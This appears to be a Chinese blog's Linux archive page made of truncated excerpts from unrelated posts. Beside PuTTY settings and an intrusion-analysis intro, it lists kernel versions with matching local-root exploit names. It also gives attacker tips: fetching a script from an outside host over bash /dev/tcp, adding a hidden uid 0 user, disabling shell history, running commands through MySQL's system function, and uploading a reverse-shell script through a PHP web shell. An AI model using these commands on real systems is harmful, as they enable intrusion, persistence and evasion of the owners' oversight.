转自:瘋吇
2.4.17
newlocal
kmod
2.4.18
brk
brk2
newlocal
kmod
km.2
2.4.19
Archive for the ‘Linux’ Category
Putty是一个非常小巧而又好用的ssh客户端软件
一、Putty配制:
1、设置成UTF-8,可以解决中文乱码问题。
2、设置字体,默认是10pt,可以修改成12px ,仿宋GB2312。
作者:baoz
日期:2006-11-18
http://baoz.net
CHNAGES:
2006-12-10 应网友需求,增加清理后门的详细操作。
本文中的ip地址和主机名都被替换了,请不要对号入座,本文手法仅供参考,在正规的入侵检测操作中,我们还是需要注意很多流程和细节上的问题。另外本文对一些基本概念或者程序之类的不做解释,如果有不明白的地方,请教google。
一进ssh,哦,奇怪,米国人民问候韩国人民?有异样……
Last login: Fri Nov 17 08:21:14 2006 from ac9e2da9.ipt.aol.com
1.无wget nc等下载工具时下载文件
exec 5/dev/tcp/yese.yi.org/80 &&echo -e “GET /c.pl HTTP/1.0\n” >&5 && cat< &5 > c.pl
2.Linux添加uid为0的用户
useradd -o -u 0 cnbird
3.bash去掉history记录
export HISTSIZE=0
export HISTFILE=/dev/null
4.SSH反向链接
ssh…
mysql5.x for linux下面有一个函数,可以帮助我们干很多事情,这个函数4。x下面貌似没,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的明天再看看函数手册,再装一个实验一下。
mysql 5.x里面引入了一个system函数,这个函数可以执行系统命令,当mysql以root登陆的时候,就可以利用这个函数执行命令,当然是在权限许可的范围内。
一般我们按照常规思路,搞到mysql的root密码之后,我们都会连接上去,创建一个表,然后outfile,搞到一个webshell ,然后提权如此这般。今天我们换一种方式。
作者wjs
qq 825680101
我也是刚接触linux,谢谢师傅sunwear的指导。
先在网站目录上传1.pl,是个反弹脚本
Phpshell执行chmod +x 1.pl,给1.pl执行权限,图0
